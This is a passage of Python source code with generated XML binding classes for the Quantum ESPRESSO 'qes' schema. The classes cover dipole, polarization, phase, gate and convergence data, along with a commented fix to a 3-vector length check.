    factory = staticmethod(factory)
    def get_electronicDipole(self): return self.electronicDipole
    def set_electronicDipole(self, electronicDipole): self.electronicDipole = electronicDipole
    def get_ionicDipole(self): return self.ionicDipole
    def set_ionicDipole(self, ionicDipole): self.ionicDipole = ionicDipole
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double: exactly 3
        # components.  Emits a warning only; never raises.
        #
        # BUGFIX: the generated check was ``len(str(value)) != 3``, which
        # compares the *character* count of the value's string form against 3,
        # so any real 3-vector (e.g. "0.1 0.2 0.3", 11 characters) warned
        # spuriously while genuinely malformed values of 3 characters passed.
        # Count the components instead: split strings on whitespace, take
        # len() of sequences, and treat a bare scalar as a single component.
        if value is not None and Validate_simpletypes_:
            if isinstance(value, str):
                components_ = value.split()
            else:
                try:
                    components_ = list(value)
                except TypeError:
                    components_ = [value]
            if len(components_) != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.electronicDipole is not None or
            self.ionicDipole is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='finiteFieldOutType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('finiteFieldOutType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='finiteFieldOutType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='finiteFieldOutType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='finiteFieldOutType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='finiteFieldOutType', fromsubclass_=False, pretty_print=True):
        """Serialize the two dipole 3-vectors inline as double lists."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.electronicDipole is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:electronicDipole>%s</qes:electronicDipole>%s' % (self.gds_format_double_list(self.electronicDipole, input_name='electronicDipole'), eol_))
        if self.ionicDipole is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ionicDipole>%s</qes:ionicDipole>%s' % (self.gds_format_double_list(self.ionicDipole, input_name='ionicDipole'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name, validating it as a 3-vector."""
        if nodeName_ == 'electronicDipole':
            electronicDipole_ = child_.text
            electronicDipole_ = self.gds_validate_double_list(electronicDipole_, node, 'electronicDipole')
            self.electronicDipole = electronicDipole_
            # validate type d3vectorType
            self.validate_d3vectorType(self.electronicDipole)
        elif nodeName_ == 'ionicDipole':
            ionicDipole_ = child_.text
            ionicDipole_ = self.gds_validate_double_list(ionicDipole_, node, 'ionicDipole')
            self.ionicDipole = ionicDipole_
            # validate type d3vectorType
            self.validate_d3vectorType(self.ionicDipole)
# end class finiteFieldOutType
class polarizationType(GeneratedsSuper):
    """XML binding for the ``polarizationType`` complex type.

    Holds a polarization child (scalarQuantityType), a double ``modulus``,
    and a ``direction`` d3vectorType (exactly three doubles, serialized as
    a whitespace-separated list).  Generated-style class
    (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, polarization=None, modulus=None, direction=None):
        self.original_tagname_ = None
        self.polarization = polarization
        self.modulus = modulus
        self.direction = direction
        self.validate_d3vectorType(self.direction)
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, polarizationType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if polarizationType.subclass:
            return polarizationType.subclass(*args_, **kwargs_)
        else:
            return polarizationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_polarization(self): return self.polarization
    def set_polarization(self, polarization): self.polarization = polarization
    def get_modulus(self): return self.modulus
    def set_modulus(self, modulus): self.modulus = modulus
    def get_direction(self): return self.direction
    def set_direction(self, direction): self.direction = direction
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double: exactly 3
        # components.  Emits a warning only; never raises.
        #
        # BUGFIX: the generated check was ``len(str(value)) != 3``, which
        # compares the *character* count of the value's string form against 3,
        # so any real 3-vector (e.g. "0.1 0.2 0.3", 11 characters) warned
        # spuriously while genuinely malformed values of 3 characters passed.
        # Count the components instead: split strings on whitespace, take
        # len() of sequences, and treat a bare scalar as a single component.
        if value is not None and Validate_simpletypes_:
            if isinstance(value, str):
                components_ = value.split()
            else:
                try:
                    components_ = list(value)
                except TypeError:
                    components_ = [value]
            if len(components_) != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.polarization is not None or
            self.modulus is not None or
            self.direction is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='polarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('polarizationType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='polarizationType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='polarizationType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='polarizationType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='polarizationType', fromsubclass_=False, pretty_print=True):
        """Serialize children: polarization exports itself; modulus and
        direction are written inline as double / double-list text."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.polarization is not None:
            self.polarization.export(outfile, level, namespaceprefix_, name_='polarization', pretty_print=pretty_print)
        if self.modulus is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:modulus>%s</qes:modulus>%s' % (self.gds_format_double(self.modulus, input_name='modulus'), eol_))
        if self.direction is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:direction>%s</qes:direction>%s' % (self.gds_format_double_list(self.direction, input_name='direction'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name."""
        if nodeName_ == 'polarization':
            obj_ = scalarQuantityType.factory()
            obj_.build(child_)
            self.polarization = obj_
            obj_.original_tagname_ = 'polarization'
        elif nodeName_ == 'modulus' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'modulus')
            self.modulus = fval_
        elif nodeName_ == 'direction':
            direction_ = child_.text
            direction_ = self.gds_validate_double_list(direction_, node, 'direction')
            self.direction = direction_
            # validate type d3vectorType
            self.validate_d3vectorType(self.direction)
# end class polarizationType
class ionicPolarizationType(GeneratedsSuper):
    """XML binding for the ``ionicPolarizationType`` complex type.

    Holds one ion's polarization contribution: an ``ion`` child (atomType),
    a double ``charge``, and a ``phase`` child (phaseType).  Generated-style
    class (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, ion=None, charge=None, phase=None):
        self.original_tagname_ = None
        self.ion = ion
        self.charge = charge
        self.phase = phase
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ionicPolarizationType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ionicPolarizationType.subclass:
            return ionicPolarizationType.subclass(*args_, **kwargs_)
        else:
            return ionicPolarizationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain get_/set_ accessor pairs, generated style.
    def get_ion(self): return self.ion
    def set_ion(self, ion): self.ion = ion
    def get_charge(self): return self.charge
    def set_charge(self, charge): self.charge = charge
    def get_phase(self): return self.phase
    def set_phase(self, phase): self.phase = phase
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.ion is not None or
            self.charge is not None or
            self.phase is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='ionicPolarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ionicPolarizationType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ionicPolarizationType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ionicPolarizationType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ionicPolarizationType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ionicPolarizationType', fromsubclass_=False, pretty_print=True):
        """Serialize children: ion and phase export themselves; charge is
        written inline as a double."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.ion is not None:
            self.ion.export(outfile, level, namespaceprefix_, name_='ion', pretty_print=pretty_print)
        if self.charge is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:charge>%s</qes:charge>%s' % (self.gds_format_double(self.charge, input_name='charge'), eol_))
        if self.phase is not None:
            self.phase.export(outfile, level, namespaceprefix_, name_='phase', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name."""
        if nodeName_ == 'ion':
            obj_ = atomType.factory()
            obj_.build(child_)
            self.ion = obj_
            obj_.original_tagname_ = 'ion'
        elif nodeName_ == 'charge' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'charge')
            self.charge = fval_
        elif nodeName_ == 'phase':
            obj_ = phaseType.factory()
            obj_.build(child_)
            self.phase = obj_
            obj_.original_tagname_ = 'phase'
# end class ionicPolarizationType
class electronicPolarizationType(GeneratedsSuper):
    """XML binding for the ``electronicPolarizationType`` complex type.

    Holds one electronic polarization contribution: a ``firstKeyPoint``
    child (k_pointType), an integer ``spin`` (parsed as a positiveInteger),
    and a ``phase`` child (phaseType).  Generated-style class
    (factory/export/build protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, firstKeyPoint=None, spin=None, phase=None):
        self.original_tagname_ = None
        self.firstKeyPoint = firstKeyPoint
        self.spin = spin
        self.phase = phase
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, electronicPolarizationType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if electronicPolarizationType.subclass:
            return electronicPolarizationType.subclass(*args_, **kwargs_)
        else:
            return electronicPolarizationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain get_/set_ accessor pairs, generated style.
    def get_firstKeyPoint(self): return self.firstKeyPoint
    def set_firstKeyPoint(self, firstKeyPoint): self.firstKeyPoint = firstKeyPoint
    def get_spin(self): return self.spin
    def set_spin(self, spin): self.spin = spin
    def get_phase(self): return self.phase
    def set_phase(self, phase): self.phase = phase
    def hasContent_(self):
        # True when any child element is present; decides between an empty
        # ('<tag/>') and a full element in export().
        if (
            self.firstKeyPoint is not None or
            self.spin is not None or
            self.phase is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='electronicPolarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element (tag, attributes, children)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('electronicPolarizationType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electronicPolarizationType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electronicPolarizationType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electronicPolarizationType'):
        # No XML attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electronicPolarizationType', fromsubclass_=False, pretty_print=True):
        """Serialize children: firstKeyPoint and phase export themselves;
        spin is written inline as an integer."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.firstKeyPoint is not None:
            self.firstKeyPoint.export(outfile, level, namespaceprefix_, name_='firstKeyPoint', pretty_print=pretty_print)
        if self.spin is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spin>%s</qes:spin>%s' % (self.gds_format_integer(self.spin, input_name='spin'), eol_))
        if self.phase is not None:
            self.phase.export(outfile, level, namespaceprefix_, name_='phase', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build one child by local tag name.  spin must parse as a
        positiveInteger (> 0)."""
        if nodeName_ == 'firstKeyPoint':
            obj_ = k_pointType.factory()
            obj_.build(child_)
            self.firstKeyPoint = obj_
            obj_.original_tagname_ = 'firstKeyPoint'
        elif nodeName_ == 'spin' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'spin')
            self.spin = ival_
        elif nodeName_ == 'phase':
            obj_ = phaseType.factory()
            obj_.build(child_)
            self.phase = obj_
            obj_.original_tagname_ = 'phase'
# end class electronicPolarizationType
class phaseType(GeneratedsSuper):
    """XML binding for the ``phaseType`` simple-content type.

    An element whose text is the phase value (stored in ``valueOf_``) with
    three optional attributes: doubles ``ionic`` and ``electronic``, and a
    string ``modulus``.  Generated-style class (factory/export/build
    protocol).
    """
    subclass = None
    superclass = None
    def __init__(self, ionic=None, electronic=None, modulus=None, valueOf_=None):
        self.original_tagname_ = None
        # _cast coerces attribute values; modulus is kept as-is (no cast).
        self.ionic = _cast(float, ionic)
        self.electronic = _cast(float, electronic)
        self.modulus = _cast(None, modulus)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Prefer a registered subclass (from an active subclass module) over
        # this base class when instantiating.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, phaseType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if phaseType.subclass:
            return phaseType.subclass(*args_, **kwargs_)
        else:
            return phaseType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain get_/set_ accessor pairs, generated style.
    def get_ionic(self): return self.ionic
    def set_ionic(self, ionic): self.ionic = ionic
    def get_electronic(self): return self.electronic
    def set_electronic(self, electronic): self.electronic = electronic
    def get_modulus(self): return self.modulus
    def set_modulus(self, modulus): self.modulus = modulus
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric values (including 0 / 0.0) are substituted by 1 so they
        # count as content; otherwise fall back to the truthiness of
        # valueOf_ (None or '' means no content).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='phaseType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as an XML element.  Unlike the complex types in
        this module, the text value is written directly after '>' with no
        line break (simple-content layout)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('phaseType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name this object was originally parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='phaseType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='phaseType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='phaseType'):
        """Write the ionic/electronic/modulus attributes when set."""
        if self.ionic is not None and 'ionic' not in already_processed:
            already_processed.add('ionic')
            outfile.write(' ionic="%s"' % self.gds_format_double(self.ionic, input_name='ionic'))
        if self.electronic is not None and 'electronic' not in already_processed:
            already_processed.add('electronic')
            outfile.write(' electronic="%s"' % self.gds_format_double(self.electronic, input_name='electronic'))
        if self.modulus is not None and 'modulus' not in already_processed:
            already_processed.add('modulus')
            outfile.write(' modulus=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.modulus), input_name='modulus')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='phaseType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass
    def build(self, node):
        """Populate this object from an ElementTree-style *node*; return self.
        The element's full text content becomes valueOf_."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the three optional attributes; ionic and electronic must be
        floats, modulus is kept as a raw string."""
        value = find_attr_value_('ionic', node)
        if value is not None and 'ionic' not in already_processed:
            already_processed.add('ionic')
            try:
                self.ionic = float(value)
            except ValueError as exp:
                raise ValueError('Bad float/double attribute (ionic): %s' % exp)
        value = find_attr_value_('electronic', node)
        if value is not None and 'electronic' not in already_processed:
            already_processed.add('electronic')
            try:
                self.electronic = float(value)
            except ValueError as exp:
                raise ValueError('Bad float/double attribute (electronic): %s' % exp)
        value = find_attr_value_('modulus', node)
        if value is not None and 'modulus' not in already_processed:
            already_processed.add('modulus')
            self.modulus = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: no child elements.
        pass
# end class phaseType
class gateInfoType(GeneratedsSuper):
    """Generated binding for the qes ``gateInfoType`` XML complex type.

    Holds the charged-plane ("gate") correction values reported by the
    code: ``pot_prefactor``, ``gate_zpos``, ``gate_gate_term`` and
    ``gatefieldEnergy`` — all optional double-valued child elements.
    """
    subclass = None
    superclass = None
    def __init__(self, pot_prefactor=None, gate_zpos=None, gate_gate_term=None, gatefieldEnergy=None):
        self.original_tagname_ = None
        self.pot_prefactor = pot_prefactor
        self.gate_zpos = gate_zpos
        self.gate_gate_term = gate_gate_term
        self.gatefieldEnergy = gatefieldEnergy
    # generateDS factory hook: returns an instance of a registered subclass
    # when one exists, otherwise a plain gateInfoType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, gateInfoType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if gateInfoType.subclass:
            return gateInfoType.subclass(*args_, **kwargs_)
        else:
            return gateInfoType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors kept for backward compatibility with generated callers.
    def get_pot_prefactor(self): return self.pot_prefactor
    def set_pot_prefactor(self, pot_prefactor): self.pot_prefactor = pot_prefactor
    def get_gate_zpos(self): return self.gate_zpos
    def set_gate_zpos(self, gate_zpos): self.gate_zpos = gate_zpos
    def get_gate_gate_term(self): return self.gate_gate_term
    def set_gate_gate_term(self, gate_gate_term): self.gate_gate_term = gate_gate_term
    def get_gatefieldEnergy(self): return self.gatefieldEnergy
    def set_gatefieldEnergy(self, gatefieldEnergy): self.gatefieldEnergy = gatefieldEnergy
    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        if (
            self.pot_prefactor is not None or
            self.gate_zpos is not None or
            self.gate_gate_term is not None or
            self.gatefieldEnergy is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='gateInfoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('gateInfoType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='gateInfoType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='gateInfoType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='gateInfoType'):
        # gateInfoType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='gateInfoType', fromsubclass_=False, pretty_print=True):
        """Write each non-None double child as a qes-namespaced element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.pot_prefactor is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:pot_prefactor>%s</qes:pot_prefactor>%s' % (self.gds_format_double(self.pot_prefactor, input_name='pot_prefactor'), eol_))
        if self.gate_zpos is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:gate_zpos>%s</qes:gate_zpos>%s' % (self.gds_format_double(self.gate_zpos, input_name='gate_zpos'), eol_))
        if self.gate_gate_term is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:gate_gate_term>%s</qes:gate_gate_term>%s' % (self.gds_format_double(self.gate_gate_term, input_name='gate_gate_term'), eol_))
        if self.gatefieldEnergy is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:gatefieldEnergy>%s</qes:gatefieldEnergy>%s' % (self.gds_format_double(self.gatefieldEnergy, input_name='gatefieldEnergy'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # gateInfoType carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element's text into the matching double field.

        Calls raise_parse_error (which raises) on non-numeric content.
        """
        if nodeName_ == 'pot_prefactor' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'pot_prefactor')
            self.pot_prefactor = fval_
        elif nodeName_ == 'gate_zpos' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'gate_zpos')
            self.gate_zpos = fval_
        elif nodeName_ == 'gate_gate_term' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'gate_gate_term')
            self.gate_gate_term = fval_
        elif nodeName_ == 'gatefieldEnergy' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'gatefieldEnergy')
            self.gatefieldEnergy = fval_
# end class gateInfoType
class convergence_infoType(GeneratedsSuper):
    """Generated binding for the qes ``convergence_infoType`` complex type:
    an SCF convergence report (``scf_conv``) optionally paired with an
    ionic-optimization convergence report (``opt_conv``)."""
    subclass = None
    superclass = None

    def __init__(self, scf_conv=None, opt_conv=None):
        self.original_tagname_ = None
        self.scf_conv = scf_conv
        self.opt_conv = opt_conv

    @staticmethod
    def factory(*args_, **kwargs_):
        """Build convergence_infoType, honoring any registered subclass."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, convergence_infoType)
            if override is not None:
                return override(*args_, **kwargs_)
        cls = convergence_infoType.subclass or convergence_infoType
        return cls(*args_, **kwargs_)

    def get_scf_conv(self):
        return self.scf_conv

    def set_scf_conv(self, scf_conv):
        self.scf_conv = scf_conv

    def get_opt_conv(self):
        return self.opt_conv

    def set_opt_conv(self, opt_conv):
        self.opt_conv = opt_conv

    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        return self.scf_conv is not None or self.opt_conv is not None

    def export(self, outfile, level, namespaceprefix_='qes:', name_='convergence_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        override_ns = GenerateDSNamespaceDefs_.get('convergence_infoType')
        if override_ns is not None:
